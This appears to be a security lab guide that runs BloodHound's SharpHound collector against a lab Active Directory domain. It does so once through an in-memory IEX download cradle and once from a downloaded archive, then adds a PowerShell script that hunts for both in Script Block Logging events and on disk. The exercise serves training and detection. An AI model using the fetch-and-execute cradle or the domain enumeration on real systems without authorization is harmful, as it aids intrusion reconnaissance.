The BloodHound tools are based in part on the Active Directory Control Paths project. The toolkit enumerates a wide array of information available from Active Directory. Coupled with the Neo4j interface, this is an incredible tool with varied implications for both blue and red teams. From a red team perspective, the BloodHound toolkit can assist a tester with visually mapping the fastest paths to a domain admin or other specific high-interest target. Blue teams can use this tool to keep an eye on paths, privileged sessions, account usage, group membership, and more.
Import and execute BloodHound's collector, an enumeration script that gathers information about Active Directory. Then search for the execution of the script in the Optics Infrastructure.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the results of the above commands differ, confirm you are operating on the correct system and in the correct user context before continuing.
The next group of commands enables TLS 1.2, downloads the SharpHound PowerShell script from the internet and loads it directly into memory (no file is written to disk), then runs the collector with Invoke-BloodHound.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Invoke-BloodHound
PS C:\Users\itadmin> IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
PS C:\Users\itadmin> Invoke-BloodHound
-----------------------------------------------
Initializing SharpHound at 6:45 AM on 6/28/2020
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 84 MB RAM
Status: 277 objects finished (+277 277)/s -- Using 113 MB RAM
Enumeration finished in 00:00:01.1059298
Compressing data to C:\Users\itadmin\20200628064526_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 6:45 AM on 6/28/2020! Happy Graphing!
With the SharpHound tool completed, move on to the next step of this lab.
Download, extract, and execute the BloodHoundAD data collector via PowerShell
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the results of the above commands differ, confirm you are operating on the correct system and in the correct user context before continuing.
From the PowerShell console, we enable TLS 1.2, download the BloodHound release archive from GitHub, expand the archive, import the SharpHound PowerShell module from it, and finally run Invoke-BloodHound. Unlike the previous method, this one leaves the archive and the extracted collector on disk.
$ProgressPreference = 'SilentlyContinue'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/BloodHoundAD/BloodHound/archive/master.zip -OutFile "master.zip"
Expand-Archive master.zip
Import-Module .\master\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound
-----------------------------------------------
Initializing SharpHound at 7:01 AM on 6/28/2020
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File Found! Loaded 521 Objects in cache
PS C:\Users\itadmin>
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 103 MB RAM
Status: 277 objects finished (+277 ∞)/s -- Using 110 MB RAM
Enumeration finished in 00:00:00.5343055
Compressing data to C:\Users\itadmin\20200628070125_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 7:01 AM on 6/28/2020! Happy Graphing!
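Both collection methods above leave evidence a defender can look for: the in-memory cradle (IEX + Net.WebClient.DownloadString) and the Invoke-WebRequest/Import-Module variant are both captured by PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), and SharpHound writes a <timestamp>_BloodHound.zip archive to the working directory. The following is an added hunting example, not part of the lab or the BloodHound project. It assumes Script Block Logging is enabled on WS01 and that the console can read the Operational log; the function names Find-SharpHoundScriptBlocks and Find-SharpHoundArtifacts are hypothetical, and the indicator strings are taken from the commands and output shown on this page.

```powershell
# Added hunting example (not part of the lab): look for the two SharpHound
# execution patterns shown above using PowerShell Script Block Logging
# (Event ID 4104, Microsoft-Windows-PowerShell/Operational) and the
# collector's on-disk output. Assumes Script Block Logging is enabled and
# that this console may read the Operational log.

# Indicator strings taken from the commands and output on this page.
$Indicators = @(
    'DownloadString',     # in-memory download cradle (IEX + Net.WebClient)
    'Invoke-WebRequest',  # archive-download variant
    'SharpHound',         # script / module name
    'Invoke-BloodHound'   # collector entry point
)

function Find-SharpHoundScriptBlocks {
    param(
        [datetime]$Since = (Get-Date).AddDays(-7),
        [string[]]$Patterns = $Indicators
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # For 4104, Properties[2] is ScriptBlockText and Properties[4] is Path
            # (Path is empty when the block was typed interactively, as in this lab).
            $text = [string]$_.Properties[2].Value
            if (-not $text) { return }
            $hits = $Patterns | Where-Object { $text -match [regex]::Escape($_) }
            if ($hits) {
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    UserSid     = $_.UserId
                    Path        = $_.Properties[4].Value
                    Indicators  = ($hits -join ', ')
                    Snippet     = $flat.Substring(0, [Math]::Min(120, $flat.Length))
                }
            }
        }
}

function Find-SharpHoundArtifacts {
    param([string]$Root = 'C:\Users')
    # SharpHound writes <timestamp>_BloodHound.zip to the working directory (see the
    # output above); the archive-download method also leaves SharpHound.ps1 on disk.
    Get-ChildItem -Path $Root -Recurse -Force -ErrorAction SilentlyContinue `
        -Include '*_BloodHound.zip', 'SharpHound.ps1', 'SharpHound.exe' |
        Select-Object FullName, Length, LastWriteTime
}

Find-SharpHoundScriptBlocks | Format-Table -AutoSize
Find-SharpHoundArtifacts   | Format-Table -AutoSize
```

Run it from an elevated PowerShell console on WS01 after completing the two methods above; the first table should show the 4104 records containing DownloadString, Invoke-WebRequest and Invoke-BloodHound, and the second should list the two <timestamp>_BloodHound.zip archives under C:\Users\itadmin together with the extracted SharpHound.ps1. Matching on literal strings is deliberately simple; an attacker can obfuscate the cradle, so the zip artifact and the LDAP/SMB session traffic SharpHound generates are the more robust signals to pair with this.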
Having invoked the BloodHound ingestor with two different methods, let's look at hunting for these activities.
Continue on to L1120-Blue